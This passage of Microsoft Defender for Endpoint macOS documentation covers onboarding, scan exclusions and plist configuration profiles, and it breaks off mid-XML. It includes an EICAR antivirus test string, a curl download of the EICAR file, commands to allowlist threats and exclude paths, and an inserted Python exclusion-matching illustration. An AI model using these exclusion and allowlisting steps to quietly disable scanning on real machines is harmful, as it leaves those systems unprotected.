1. Open System Preferences > Security & Privacy > Privacy > Full Disk Access. Click
the lock icon to make changes (bottom of the dialog box).

2. Grant Full Disk Access permission to Microsoft Defender and Microsoft
Defender's Endpoint Security Extension.

3. Select General > Restart for the new system extensions to take effect.

4. Enable Potentially Unwanted Application (PUA) in block mode.

To enable PUA, see Configure PUA protection.

5. Enable Network Protection.

To enable Network protection, see Manual deployment.

6. Enable Device Control.

To enable Device Control, see Device control for macOS.

7. Enable Tamper Protection in block mode.

To enable Tamper Protection, see Protect macOS security settings with tamper
protection.

8. If you have the Microsoft Purview – Endpoint data loss prevention license, you can
review Get started with Microsoft Purview - Endpoint data loss prevention.

Background execution

Starting with macOS 13, a user must explicitly allow an application to run in the background.
macOS pops up a prompt telling the user that Microsoft Defender can run in the
background.

You can view applications permitted to run in the background in System Settings > Login
Items > Allow in the Background at any time.

Make sure all Microsoft Defender and Microsoft Corporation items are enabled. If they
are disabled, macOS will not start Microsoft Defender after a machine restart.

Onboarding Package

Once you have installed MDE on the macOS client, you must onboard it by running the
onboarding package, which registers the device with your Microsoft Defender for Endpoint
tenant and licenses it.

1. Verify whether MDE on macOS has already been onboarded.

Copy wdav.pkg and MicrosoftDefenderATPOnboardingMacOs.sh to the device where
you have deployed Microsoft Defender for Endpoint on macOS.

Before onboarding, the client device isn't associated with an org_id; the org_id attribute
is blank:

Bash

mdatp health --field org_id

2. Run the Bash script to install the onboarding package:

Bash

sudo bash -x MicrosoftDefenderATPOnboardingMacOs.sh

3. Verify that the device is now associated with your organization and reports a valid
org ID:

Bash

mdatp health --field org_id

After installation, you'll see the Microsoft Defender icon in the macOS status bar in
the top-right corner.

You can troubleshoot license issues for Microsoft Defender for Endpoint on
macOS.

4. Run the connectivity test:

Bash

mdatp connectivity test

You can troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on
macOS.

Verifying anti-malware detection

To test anti-malware detection, see Antivirus detection test to verify device onboarding
and reporting services.

Verifying EDR detection

To test EDR detection, see EDR detection test to verify device onboarding and reporting
services.

Logging installation issues

For more information on how to find the automatically generated log that's created by
the installer, see Logging installation issues.

For information on troubleshooting procedures, see:

Troubleshoot system extension issues in Microsoft Defender for Endpoint on macOS
Troubleshoot installation issues for Microsoft Defender for Endpoint on macOS
Troubleshoot license issues for Microsoft Defender for Endpoint on macOS
Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on macOS
Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS

Uninstallation

See Uninstalling for details on how to remove Microsoft Defender for Endpoint on
macOS from client devices.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in
our Tech Community: Microsoft Defender for Endpoint Tech Community.
If you have any feedback that you'd like to share, submit it by opening
Microsoft Defender for Endpoint on Mac on your device and navigating to Help >
Send feedback.



Configure and validate exclusions for
Microsoft Defender for Endpoint on
macOS
Article • 05/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR


This article provides information on how to define exclusions that apply to on-demand
scans, and real-time protection and monitoring.

Important

The exclusions described in this article don't apply to other Defender for Endpoint
on Mac capabilities, including endpoint detection and response (EDR). Files that
you exclude using the methods described in this article can still trigger EDR alerts
and other detections.

You can exclude certain files, folders, processes, and process-opened files from Defender
for Endpoint on Mac scans.

Exclusions can be useful to avoid incorrect detections on files or software that are
unique or customized to your organization. They can also be useful for mitigating
performance issues caused by Defender for Endpoint on Mac.

Warning

Defining exclusions lowers the protection offered by Defender for Endpoint on
Mac. You should always evaluate the risks that are associated with implementing
exclusions, and you should only exclude files that you are confident are not
malicious.

Supported exclusion types

The following table shows the exclusion types supported by Defender for Endpoint on
Mac.

Exclusion        Definition                                               Examples
File extension   All files with the extension, anywhere on the machine    .test
File             A specific file identified by the full path              /var/log/test.log
                                                                          /var/log/*.log
                                                                          /var/log/install.?.log
Folder           All files under the specified folder (recursively)       /var/log/
                                                                          /var/*/
Process          A specific process (specified either by the full path    /bin/cat
                 or file name) and all files opened by it                 cat
                                                                          c?t
File, folder, and process exclusions support the following wildcards:

Wildcard   Description                                                  Examples
*          Matches any number of any characters including none (note:   /var/*/tmp includes any file in /var/abc/tmp and its
           if this wildcard is not used at the end of the path, it      subdirectories, and /var/def/tmp and its subdirectories.
           substitutes only one folder)                                 It does not include /var/abc/log or /var/def/log.
                                                                        /var/*/ includes any file in /var and its subdirectories.
?          Matches any single character                                 file?.log includes file1.log and file2.log, but not
                                                                        file123.log

Note

When using the * wildcard at the end of the path, it will match all files and
subdirectories under the parent of the wildcard.

Note

The product attempts to resolve firmlinks when evaluating exclusions. Firmlink
resolution does not work when the exclusion contains wildcards or the target file
(on the Data volume) does not exist.

How to configure the list of exclusions

From the management console


For more information on how to configure exclusions from JAMF, Intune, or another
management console, see Set preferences for Defender for Endpoint on Mac.

From the user interface


Open the Defender for Endpoint application and navigate to Manage settings > Add or
Remove Exclusion..., as shown in the following screenshot:

Select the type of exclusion that you wish to add and follow the prompts.

Validate exclusion lists with the EICAR test file

You can validate that your exclusion lists are working by using curl to download a test
file.

In the following Bash snippet, replace test.txt with a file that conforms to your
exclusion rules. For example, if you have excluded the .testing extension, replace
test.txt with test.testing . If you are testing a path, ensure that you run the command
within that path.

Bash

curl -o test.txt https://secure.eicar.org/eicar.com.txt

If Defender for Endpoint on Mac reports malware, then the rule is not working. If there is
no report of malware, and the downloaded file exists, then the exclusion is working. You
can open the file to confirm that the contents are the same as what is described on the
EICAR test file website.

If you do not have Internet access, you can create your own EICAR test file. Write the
EICAR string to a new text file with the following Bash command:

Bash

echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > test.txt

You can also copy the string into a blank text file and attempt to save it with the file
name or in the folder you are attempting to exclude.

Allow threats
In addition to excluding certain content from being scanned, you can also configure the
product not to detect some classes of threats (identified by the threat name). You
should exercise caution when using this functionality, as it can leave your device
unprotected.

To add a threat name to the allowed list, execute the following command:

Bash

mdatp threat allowed add --name [threat-name]

The threat name associated with a detection on your device can be obtained using the
following command:

Bash

mdatp threat list

For example, to add EICAR-Test-File (not a virus) (the threat name associated with
the EICAR detection) to the allowed list, execute the following command:

Bash
mdatp threat allowed add --name "EICAR-Test-File (not a virus)"

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Set preferences for Microsoft Defender
for Endpoint on macOS
Article • 06/22/2023

Applies to:

Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Important

This article contains instructions for how to set preferences for Microsoft Defender
for Endpoint on macOS in enterprise organizations. To configure Microsoft
Defender for Endpoint on macOS using the command-line interface, see Resources.

Summary
In enterprise organizations, Microsoft Defender for Endpoint on macOS can be
managed through a configuration profile that is deployed by using one of several
management tools. Preferences that are managed by your security operations team take
precedence over preferences that are set locally on the device. Changing the
preferences that are set through the configuration profile requires escalated privileges
and isn't available for users without administrative permissions.

This article describes the structure of the configuration profile, includes a recommended
profile that you can use to get started, and provides instructions on how to deploy the
profile.

Configuration profile structure


The configuration profile is a .plist file that consists of entries identified by a key (which
denotes the name of the preference), followed by a value, which depends on the nature
of the preference. Values can either be simple (such as a numerical value) or complex,
such as a nested list of preferences.

Caution

The layout of the configuration profile depends on the management console that
you are using. The following sections contain examples of configuration profiles for
JAMF and Intune.

The top level of the configuration profile includes product-wide preferences and entries
for subareas of Microsoft Defender for Endpoint, which are explained in more detail in
the next sections.

Antivirus engine preferences

The antivirusEngine section of the configuration profile is used to manage the
preferences of the antivirus component of Microsoft Defender for Endpoint.

Section      Value
Domain       com.microsoft.wdav
Key          antivirusEngine
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Enforcement level for antivirus engine

Specifies the enforcement preference of the antivirus engine. There are three values for
setting the enforcement level:

Real-time ( real_time ): Real-time protection (scan files as they're accessed) is
enabled.
On-demand ( on_demand ): Files are scanned only on demand. In this mode:
    Real-time protection is turned off.
Passive ( passive ): Runs the antivirus engine in passive mode. In this mode:
    Real-time protection is turned off.
    On-demand scanning is turned on.
    Automatic threat remediation is turned off.
    Security intelligence updates are turned on.
    Status menu icon is hidden.

Section          Value
Domain           com.microsoft.wdav
Key              enforcementLevel
Data type        String
Possible values  real_time (default), on_demand, passive
Comments         Available in Microsoft Defender for Endpoint version 101.10.72 or higher.

Configure file hash computation feature

Enables or disables file hash computation feature. When this feature is enabled,
Defender for Endpoint computes hashes for files it scans to enable better matching
against the indicator rules. On macOS, only the script and Mach-O (32 and 64 bit) files
are considered for this hash computation (from engine version 1.1.20000.2 or higher).
Note that enabling this feature might impact device performance. For more details,
please refer to: Create indicators for files.

Section          Value
Domain           com.microsoft.wdav
Key              enableFileHashComputation
Data type        Boolean
Possible values  false (default), true
Comments         Available in Defender for Endpoint version 101.86.81 or higher.

Run a scan after definitions are updated

Specifies whether to start a process scan after new security intelligence updates are
downloaded on the device. Enabling this setting triggers an antivirus scan on the
running processes of the device.

Section          Value
Domain           com.microsoft.wdav
Key              scanAfterDefinitionUpdate
Data type        Boolean
Possible values  true (default), false
Comments         Available in Microsoft Defender for Endpoint version 101.41.10 or higher.

Scan archives (on-demand antivirus scans only)

Specifies whether to scan archives during on-demand antivirus scans.

Section          Value
Domain           com.microsoft.wdav
Key              scanArchives
Data type        Boolean
Possible values  true (default), false
Comments         Available in Microsoft Defender for Endpoint version 101.41.10 or higher.

Degree of parallelism for on-demand scans

Specifies the degree of parallelism for on-demand scans. This corresponds to the
number of threads used to perform the scan and impacts the CPU usage, as well as the
duration of the on-demand scan.

Section          Value
Domain           com.microsoft.wdav
Key              maximumOnDemandScanThreads
Data type        Integer
Possible values  2 (default). Allowed values are integers between 1 and 64.
Comments         Available in Microsoft Defender for Endpoint version 101.41.10 or higher.

Exclusion merge policy

Specify the merge policy for exclusions. This can be a combination of
administrator-defined and user-defined exclusions ( merge ), or only
administrator-defined exclusions ( admin_only ). This setting can be used to restrict
local users from defining their own exclusions.

Section          Value
Domain           com.microsoft.wdav
Key              exclusionsMergePolicy
Data type        String
Possible values  merge (default), admin_only
Comments         Available in Microsoft Defender for Endpoint version 100.83.73 or higher.

Scan exclusions

Specify entities excluded from being scanned. Exclusions can be specified by full paths,
extensions, or file names. (Exclusions are specified as an array of items; the
administrator can specify as many elements as necessary, in any order.)

Section      Value
Domain       com.microsoft.wdav
Key          exclusions
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Type of exclusion

Specify content excluded from being scanned by type.

Section          Value
Domain           com.microsoft.wdav
Key              $type
Data type        String
Possible values  excludedPath, excludedFileExtension, excludedFileName

Path to excluded content

Specify content excluded from being scanned by full file path.

Section          Value
Domain           com.microsoft.wdav
Key              path
Data type        String
Possible values  valid paths
Comments         Applicable only if $type is excludedPath

Supported exclusion types

The following table shows the exclusion types supported by Defender for Endpoint on
Mac.

Exclusion        Definition                                               Examples
File extension   All files with the extension, anywhere on the device     .test
File             A specific file identified by the full path              /var/log/test.log
                                                                          /var/log/*.log
                                                                          /var/log/install.?.log
Folder           All files under the specified folder (recursively)       /var/log/
                                                                          /var/*/
Process          A specific process (specified either by the full path    /bin/cat
                 or file name) and all files opened by it                 cat
                                                                          c?t

Important

The paths above must be hard links, not symbolic links, in order to be successfully
excluded. You can check if a path is a symbolic link by running file <path-name> .

File, folder, and process exclusions support the following wildcards:

Wildcard   Description                                       Example        Matches               Doesn't match
*          Matches any number of any characters including    /var/*/*.log   /var/log/system.log   /var/log/nested/system.log
           none (note that when this wildcard is used
           inside a path it will substitute only one
           folder)
?          Matches any single character                      file?.log      file1.log             file123.log
                                                                            file2.log
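Both wildcard tables on this page (the one in the exclusions article above and the one just shown) describe the same rules: * stands for one folder inside a path and for everything beneath the parent when it ends the path, ? stands for one character, and a folder exclusion applies recursively. The following Python module is an added illustration of those documented rules, not the product's own matching code; it lets an administrator check which paths a planned exclusion would cover before deploying it. The ScanExclusion fields mirror the $type, path, extension, name and isDirectory keys of the configuration profile; the is_overly_broad heuristic is this example's own addition and not a product check.

```python
"""Pre-check which files a Defender for Endpoint on Mac scan exclusion would
cover, following the wildcard rules in the tables above. Added illustration
of the documented semantics, not the product's own matching code."""
import re
from dataclasses import dataclass
from typing import Iterable, Optional


def glob_to_regex(pattern: str) -> str:
    """Translate one exclusion pattern to a regular expression.

    '*' matches any run of characters except '/', so inside a path it stands
    for exactly one folder; a '*' at the very end matches everything under the
    parent folder. '?' matches one character other than '/'.
    """
    parts = []
    last = len(pattern) - 1
    for i, ch in enumerate(pattern):
        if ch == "*":
            parts.append(".*" if i == last else "[^/]*")
        elif ch == "?":
            parts.append("[^/]")
        else:
            parts.append(re.escape(ch))
    return "".join(parts)


@dataclass(frozen=True)
class ScanExclusion:
    """One entry of the antivirusEngine.exclusions array."""
    type: str                   # excludedPath | excludedFileExtension | excludedFileName
    value: str                  # path, extension, or process/file name
    is_directory: bool = False  # only meaningful for excludedPath

    def covers(self, path: str) -> bool:
        """True if a file at `path` would be skipped because of this exclusion."""
        name = path.rsplit("/", 1)[-1]
        if self.type == "excludedFileExtension":
            ext = self.value.lstrip(".").lower()
            return name.lower().endswith("." + ext)
        if self.type == "excludedFileName":
            # A bare name matches the file/process name; a full path must match whole.
            target = path if "/" in self.value else name
            return re.fullmatch(glob_to_regex(self.value), target) is not None
        if self.type == "excludedPath":
            regex = glob_to_regex(self.value.rstrip("/"))
            if self.is_directory or self.value.endswith("/"):
                regex += "(/.*)?"  # folder exclusions apply recursively
            return re.fullmatch(regex, path) is not None
        raise ValueError(f"unknown exclusion $type: {self.type}")

    def is_overly_broad(self) -> bool:
        """Heuristic (this example's own): fewer than two literal path components,
        e.g. '/var/*/' or '/', excludes a large part of the file system."""
        if self.type != "excludedPath":
            return False
        literal = [p for p in self.value.split("/") if p and "*" not in p and "?" not in p]
        return len(literal) < 2


def first_match(exclusions: Iterable[ScanExclusion], path: str) -> Optional[ScanExclusion]:
    """Return the first exclusion covering `path`, or None if the file would be scanned."""
    for ex in exclusions:
        if ex.covers(path):
            return ex
    return None
```

Run the documented examples through it: `/var/*/*.log` covers `/var/log/system.log` but not `/var/log/nested/system.log`, and `file?.log` covers `file1.log` but not `file123.log`. Remember that this only models the pattern rules; the firmlink and symbolic-link caveats in the notes above still apply to the real path on disk.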

Path type (file / directory)

Indicate if the path property refers to a file or directory.

Section          Value
Domain           com.microsoft.wdav
Key              isDirectory
Data type        Boolean
Possible values  false (default), true
Comments         Applicable only if $type is excludedPath

File extension excluded from the scan

Specify content excluded from being scanned by file extension.

Section          Value
Domain           com.microsoft.wdav
Key              extension
Data type        String
Possible values  valid file extensions
Comments         Applicable only if $type is excludedFileExtension

Process excluded from the scan

Specify a process for which all file activity is excluded from scanning. The process can be
specified either by its name (for example, cat ) or full path (for example, /bin/cat ).

Section          Value
Domain           com.microsoft.wdav
Key              name
Data type        String
Possible values  any string
Comments         Applicable only if $type is excludedFileName

Allowed threats

Specify threats by name that aren't blocked by Defender for Endpoint on Mac. These
threats will be allowed to run.

Section      Value
Domain       com.microsoft.wdav
Key          allowedThreats
Data type    Array of strings

Disallowed threat actions

Restricts the actions that the local user of a device can take when threats are detected.
The actions included in this list aren't displayed in the user interface.

Section          Value
Domain           com.microsoft.wdav
Key              disallowedThreatActions
Data type        Array of strings
Possible values  allow (restricts users from allowing threats)
                 restore (restricts users from restoring threats from the quarantine)
Comments         Available in Microsoft Defender for Endpoint version 100.83.73 or higher.

Threat type settings

Specify how certain threat types are handled by Microsoft Defender for Endpoint on
macOS.

Section      Value
Domain       com.microsoft.wdav
Key          threatTypeSettings
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Threat type

Specify threat types.

Section          Value
Domain           com.microsoft.wdav
Key              key
Data type        String
Possible values  potentially_unwanted_application, archive_bomb

Action to take

Specify what action to take when a threat of the type specified in the preceding section
is detected. Choose from the following options:

Audit: your device isn't protected against this type of threat, but an entry about
the threat is logged.
Block: your device is protected against this type of threat and you're notified in the
user interface and the security console.
Off: your device isn't protected against this type of threat and nothing is logged.

Section          Value
Domain           com.microsoft.wdav
Key              value
Data type        String
Possible values  audit (default), block, off

Threat type settings merge policy

Specify the merge policy for threat type settings. This can be a combination of
administrator-defined and user-defined settings ( merge ) or only administrator-defined
settings ( admin_only ). This setting can be used to restrict local users from defining their
own settings for different threat types.

Section          Value
Domain           com.microsoft.wdav
Key              threatTypeSettingsMergePolicy
Data type        String
Possible values  merge (default), admin_only
Comments         Available in Microsoft Defender for Endpoint version 100.83.73 or higher.

Antivirus scan history retention (in days)

Specify the number of days that results are retained in the scan history on the device.
Old scan results are removed from the history. Old quarantined files are also removed
from the disk.

Section          Value
Domain           com.microsoft.wdav
Key              scanResultsRetentionDays
Data type        String
Possible values  90 (default). Allowed values are from 1 day to 180 days.
Comments         Available in Microsoft Defender for Endpoint version 101.07.23 or higher.

Maximum number of items in the antivirus scan history

Specify the maximum number of entries to keep in the scan history. Entries include all
on-demand scans performed in the past and all antivirus detections.

Section          Value
Domain           com.microsoft.wdav
Key              scanHistoryMaximumItems
Data type        String
Possible values  10000 (default). Allowed values are from 5000 items to 15000 items.
Comments         Available in Microsoft Defender for Endpoint version 101.07.23 or higher.

Cloud-delivered protection preferences

Configure the cloud-driven protection features of Microsoft Defender for Endpoint on
macOS.

Section      Value
Domain       com.microsoft.wdav
Key          cloudService
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Enable / disable cloud-delivered protection

Specify whether to enable cloud-delivered protection on the device. To improve the
security of your services, we recommend keeping this feature turned on.

Section          Value
Domain           com.microsoft.wdav
Key              enabled
Data type        Boolean
Possible values  true (default), false

Diagnostic collection level

Diagnostic data is used to keep Microsoft Defender for Endpoint secure and up to date,
detect, diagnose and fix problems, and also make product improvements. This setting
determines the level of diagnostics sent by Microsoft Defender for Endpoint to
Microsoft.

Section          Value
Domain           com.microsoft.wdav
Key              diagnosticLevel
Data type        String
Possible values  optional (default), required

Configure cloud block level

This setting determines how aggressive Defender for Endpoint will be in blocking and
scanning suspicious files. If this setting is on, Defender for Endpoint will be more
aggressive when identifying suspicious files to block and scan; otherwise, it will be less
aggressive and therefore block and scan with less frequency. There are five values for
setting cloud block level:

Normal ( normal ): The default blocking level.
Moderate ( moderate ): Delivers verdict only for high confidence detections.
High ( high ): Aggressively blocks unknown files while optimizing for performance
(greater chance of blocking non-harmful files).
High Plus ( high_plus ): Aggressively blocks unknown files and applies additional
protection measures (might impact client device performance).
Zero Tolerance ( zero_tolerance ): Blocks all unknown programs.

Section          Value
Domain           com.microsoft.wdav
Key              cloudBlockLevel
Data type        String
Possible values  normal (default), moderate, high, high_plus, zero_tolerance
Comments         Available in Defender for Endpoint version 101.56.62 or higher.

Enable / disable automatic sample submissions

Determines whether suspicious samples (that are likely to contain threats) are sent to
Microsoft. You're prompted if the submitted file is likely to contain personal information.

Section          Value
Domain           com.microsoft.wdav
Key              automaticSampleSubmission
Data type        Boolean
Possible values  true (default), false

Enable / disable automatic security intelligence updates

Determines whether security intelligence updates are installed automatically:

Section          Value
Key              automaticDefinitionUpdateEnabled
Data type        Boolean
Possible values  true (default), false

User interface preferences

Manage the preferences for the user interface of Microsoft Defender for Endpoint on
macOS.

Section      Value
Domain       com.microsoft.wdav
Key          userInterface
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Show / hide status menu icon

Specify whether to show or hide the status menu icon in the top-right corner of the
screen.

Section          Value
Domain           com.microsoft.wdav
Key              hideStatusMenuIcon
Data type        Boolean
Possible values  false (default), true

Show / hide option to send feedback

Specify whether users can submit feedback to Microsoft by going to Help > Send
Feedback.

Section          Value
Domain           com.microsoft.wdav
Key              userInitiatedFeedback
Data type        String
Possible values  enabled (default), disabled
Comments         Available in Microsoft Defender for Endpoint version 101.19.61 or higher.

Control sign-in to consumer version of Microsoft Defender

Specify whether users can sign into the consumer version of Microsoft Defender.

Section          Value
Domain           com.microsoft.wdav
Key              consumerExperience
Data type        String
Possible values  enabled (default), disabled
Comments         Available in Microsoft Defender for Endpoint version 101.60.18 or higher.

Endpoint detection and response preferences

Manage the preferences of the endpoint detection and response (EDR) component of
Microsoft Defender for Endpoint on macOS.

Section      Value
Domain       com.microsoft.wdav
Key          edr
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Device tags

Specify a tag name and its value.

The GROUP tag marks the device with the specified value. The tag is reflected in
the portal under the device page and can be used for filtering and grouping
devices.

Section      Value
Domain       com.microsoft.wdav
Key          tags
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Type of tag

Specifies the type of tag.

Section          Value
Domain           com.microsoft.wdav
Key              key
Data type        String
Possible values  GROUP

Value of tag

Specifies the value of the tag.

Section          Value
Domain           com.microsoft.wdav
Key              value
Data type        String
Possible values  any string

Important

Only one value per tag type can be set.

Tag types are unique and should not be repeated in the same configuration
profile.

Tamper Protection

Manage the preferences of the Tamper Protection component of Microsoft Defender for
Endpoint on macOS.

Section      Value
Domain       com.microsoft.wdav
Key          tamperProtection
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Enforcement level

Specifies whether Tamper Protection is enabled and, if so, whether it runs in strict mode.

Section      Value
Domain       com.microsoft.wdav
Key          enforcementLevel
Data type    String
Comments     One of 'disabled', 'audit', or 'block'

Possible values:
disabled - Tamper Protection is turned off; no prevention of attacks or reporting to
the Cloud
audit - Tamper Protection reports tampering attempts to the Cloud only, but does
not block them
block - Tamper Protection both blocks and reports attacks to the Cloud

Exclusions

Defines processes that are allowed to alter Microsoft Defender's assets without this being
considered tampering. Either path, teamId, signingId, or a combination of them must be
provided. Args can be provided additionally to identify the allowed process more
precisely.

Section      Value
Domain       com.microsoft.wdav
Key          exclusions
Data type    Dictionary (nested preference)
Comments     See the following sections for a description of the dictionary contents.

Path

Exact path of the process executable.

Section      Value
Domain       com.microsoft.wdav
Key          path
Data type    String
Comments     In case of a shell script it will be the exact path to the interpreter binary,
             e.g. /bin/zsh . No wildcards allowed.

Team Id

Apple's "Team Id" of the vendor.

Section      Value
Domain       com.microsoft.wdav
Key          teamId
Data type    String
Comments     For example, UBF8T346G9 for Microsoft

Signing Id

Apple's "Signing Id" of the package.

Section      Value
Domain       com.microsoft.wdav
Key          signingId
Data type    String
Comments     For example, com.apple.ruby for Ruby interpreter

Process arguments

Used in combination with other parameters to identify the process.

Section      Value
Domain       com.microsoft.wdav
Key          args
Data type    Array of strings
Comments     If specified, the process arguments must match these arguments exactly
             (case-sensitive)


Recommended configuration profile

To get started, we recommend the following configuration for your enterprise to take
advantage of all protection features that Microsoft Defender for Endpoint provides.

The following configuration profile (or, in case of JAMF, a property list that could be
uploaded into the custom settings configuration profile) will:

Enable real-time protection (RTP)
Specify how the following threat types are handled:
    Potentially unwanted applications (PUA) are blocked
    Archive bombs (file with a high compression rate) are audited to Microsoft
    Defender for Endpoint logs
Enable automatic security intelligence updates
Enable cloud-delivered protection
Enable automatic sample submission

Property list for JAMF recommended configuration profile

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>antivirusEngine</key>
<dict>
<key>enforcementLevel</key>
<string>real_time</string>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>automaticSampleSubmission</key>
<true/>
<key>automaticDefinitionUpdateEnabled</key>
<true/>
</dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</plist>

Intune recommended profile

XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender for Endpoint configuration settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadType</key>
<string>com.microsoft.wdav</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint configuration settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>antivirusEngine</key>
<dict>
<key>enforcementLevel</key>
<string>real_time</string>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>automaticSampleSubmission</key>
<true/>
<key>automaticDefinitionUpdateEnabled</key>
<true/>
</dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</array>
</dict>
</plist>

Full configuration profile example


The following templates contain entries for all settings described in this document and
can be used for more advanced scenarios where you want more control over Microsoft
Defender for Endpoint on macOS.

Property list for JAMF full configuration profile

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>antivirusEngine</key>
<dict>
<key>enforcementLevel</key>
<string>real_time</string>
<key>scanAfterDefinitionUpdate</key>
<true/>
<key>scanArchives</key>
<true/>
<key>maximumOnDemandScanThreads</key>
<integer>2</integer>
<key>exclusions</key>
<array>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<false/>
<key>path</key>
<string>/var/log/system.log</string>
</dict>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<true/>
<key>path</key>
<string>/home</string>
</dict>
<dict>
<key>$type</key>
<string>excludedPath</string>
<key>isDirectory</key>
<true/>
<key>path</key>
<string>/Users/*/git</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileExtension</string>
<key>extension</key>
<string>pdf</string>
</dict>
<dict>
<key>$type</key>
<string>excludedFileName</string>
<key>name</key>
<string>cat</string>
</dict>
</array>
<key>exclusionsMergePolicy</key>
<string>merge</string>
<key>allowedThreats</key>
<array>
<string>EICAR-Test-File (not a virus)</string>
</array>
<key>disallowedThreatActions</key>
<array>
<string>allow</string>
<string>restore</string>
</array>
<key>threatTypeSettings</key>
<array>
<dict>
<key>key</key>
<string>potentially_unwanted_application</string>
<key>value</key>
<string>block</string>
</dict>
<dict>
<key>key</key>
<string>archive_bomb</string>
<key>value</key>
<string>audit</string>
</dict>
</array>
<key>threatTypeSettingsMergePolicy</key>
<string>merge</string>
</dict>
<key>cloudService</key>
<dict>
<key>enabled</key>
<true/>
<key>diagnosticLevel</key>
<string>optional</string>
<key>automaticSampleSubmission</key>
<true/>
<key>automaticDefinitionUpdateEnabled</key>
<true/>
<key>cloudBlockLevel</key>
<string>normal</string>
</dict>
<key>edr</key>
<dict>
<key>tags</key>
<array>
<dict>
<key>key</key>
<string>GROUP</string>
<key>value</key>
<string>ExampleTag</string>
</dict>
</array>
</dict>
<key>tamperProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
<key>exclusions</key>
<array>
<dict>
<key>path</key>
<string>/bin/zsh</string>
<key>teamId</key>
<string/>
<key>signingId</key>
<string>com.apple.zsh</string>
<key>args</key>
<array>
<string>/usr/local/bin/test.sh</string>
</array>
</dict>
<dict>
<key>path</key>
<string>/usr/local/jamf/bin/jamf</string>
<key>teamId</key>
<string>483DWKW443</string>
<key>signingId</key>
<string>com.jamfsoftware.jamf</string>
</dict>
</array>
</dict>
<key>userInterface</key>
<dict>
<key>hideStatusMenuIcon</key>
<false/>
<key>userInitiatedFeedback</key>
<string>enabled</string>
</dict>
</dict>
</plist>

Intune full profile

XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender for Endpoint settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender for Endpoint configuration settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
